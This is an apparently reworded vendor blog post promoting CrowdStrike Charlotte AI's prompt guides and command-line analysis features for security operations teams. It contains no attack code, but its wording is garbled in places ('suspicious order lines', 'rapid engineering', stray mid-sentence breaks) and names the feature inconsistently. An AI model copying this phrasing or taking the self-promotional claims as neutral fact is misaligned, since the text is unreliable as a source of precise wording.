Since CrowdStrike® Charlotte AI™ became generally available, we’ve seen first-hand how genAI can transform security operations, enabling teams to save hours on time-sensitive tasks and accelerate response to match the speed of modern adversaries. Charlotte AI — recently named the best AI security solution by the Cybersecurity Excellence Awards and the market leader for AI Safety Co-Pilot by the Cyber Defense Global Infosec Awards – enables teams to do everything they already do faster than ever, thanks to the industry-leading CrowdStrike Falcon® platform powered by native AI.
To further accelerate the SOC transformation, we are highlighting two key innovations for Charlotte AI, announced during the RSA Conference 2024: Prompt guides and command line analysis. With Prompt Guides, teams will be able to organize sequences of prompts for common workflows that can be deployed with the press of a button. Through command-line analysis, Charlotte AI will provide analysts with intuitive explanations that demystify unfamiliar commands and scripts, providing the context analysts need to make faster, more accurate decisions.
Let’s get into the details.
Operationalizing Generative AI with Promptbooks
Training analysts to execute workflows quickly and consistently can be a tedious task. Charlotte AI’s prompt guides allow organizations to create, edit, and share collections of queries for common workflows, reducing the guesswork of deciphering. how to create a query for optimal performance and What Follow-up questions to ask to complete a workflow with Charlotte AI.
When using prompt guides, Charlotte AI users can get started quickly with ready-to-use prompt guides from CrowdStrike’s expert security teams, or create their own custom prompt guides . Users can also share personalized prompt guides with other authorized Charlotte AI users in their organization, allowing teams to collaborate and contribute to workbooks over time.
CrowdStrike’s catalog of prompt guides supports common workflows, such as:
- Zero-Day Vulnerabilities Prompt Guide: Analyzes information about a new vulnerability, assesses an organization’s exposure to it across the entire attack surface, and identifies anomalous behavior on vulnerable hosts.
- Threat Actors Guide: Scans for threat actors targeting a user’s industry or region, scans the environment for detections attributed to threat actors, assesses users’ exposure to vulnerabilities that threat actors are known to exploit and presents CrowdStrike indicators for these adversaries.
- Guide to finding indicators: Presents threat information for given indicators (IP addresses, domains, etc.) and identifies hosts that connected to those indicators over a given period of time.
- Advanced Event Search Query Prompts Guide: Generates a CrowdStrike Query Language (CQL) query based on the parameters provided in a user’s prompt.
- Live Asset Query Prompts Guide: Generates a live asset query (in OSquery language) to answer questions using CrowdStrike Falcon® for IT.
- Intel Reports Prompt Manual: Queries CrowdStrike’s threat intelligence database to surface relevant reports and specific responses to user queries.
- Sensor Deployment Prompt Guide: Provides guidance on how to deploy the Falcon sensor on different platforms (Windows, Mac, Linux, Android, iOS, etc.)
Figure 1. Organizations have the option to use ready-made prompt guides from CrowdStrike or create individual or team-shareable prompt guides.
Before enabling a prompt guide, users can specify settings to tailor the prompts to their tasks. For example, in the Zero-Day Vulnerability Promptbook example, a user can specify the CVE they want to investigate (see Figure 2).
Figure 2. Example of a zero-day investigation guide that can be customized to analyze CVEs of interest
Understanding Malicious Scripts with Command Line Analysis
To evade detection, adversaries often exploit binaries, applications, and scripts already present in an environment during intrusions. THE CrowdStrike 2024 Global Threats Report reported 73% year-over-year growth in interactive intrusions in the second half of 2023, as adversaries increasingly turn to legitimate tools and stolen credentials to quickly gain access to security environments. users. The Falcon platform applies various indicators to detect malicious scripts, from Indicators of Attack (IOA) to process-based Indicators of Compromise (IOC) to ML-based script analysis. But detection potentially malicious scripts are only half the challenge. It is not uncommon for analysts investigating detections to encounter unfamiliar commands or scripting languages, delaying or even hindering decision-making.
Using command-line scripting, Charlotte AI can now provide analysts with an easy-to-understand breakdown of what commands are used and what the code is supposed to do. This reduces the analyst’s prior knowledge burden and provides the context they need to accelerate decision-making during investigations.
Figure 3. Charlotte AI provides an explanation of a command line script, breaking down the sequence of actions the script would take if executed and the associated flags.
Users can access this feature both in Charlotte AI and as a built-in feature in the detections UI (in the case of detections that trigger flags for suspicious order lines (see Figure 4). With the press of a button, analysts can analyze reported command lines in their investigation details panel, avoiding the need to copy or rewrite a script in a dedicated query within Charlotte AI. If analysts want to dig deeper (or ask follow-up questions), each command line analysis performed in the detections UI will also appear in their conversation history within Charlotte AI, allowing them to continue their investigation. analysis in complete transparency (Figures 4 and 5).
Figures 4 and 5: In CrowdStrike Falcon® Insight XDR, an analyst can launch a command-line analysis with Charlotte AI while investigating a detection.
Allow analysts to move forward even faster
As security teams continue to adopt Generative AIPromptbooks and command-line analysis will enable organizations to move even faster, accelerating decision-making, automating investigations, and standardizing best practices for rapid engineering across their teams.
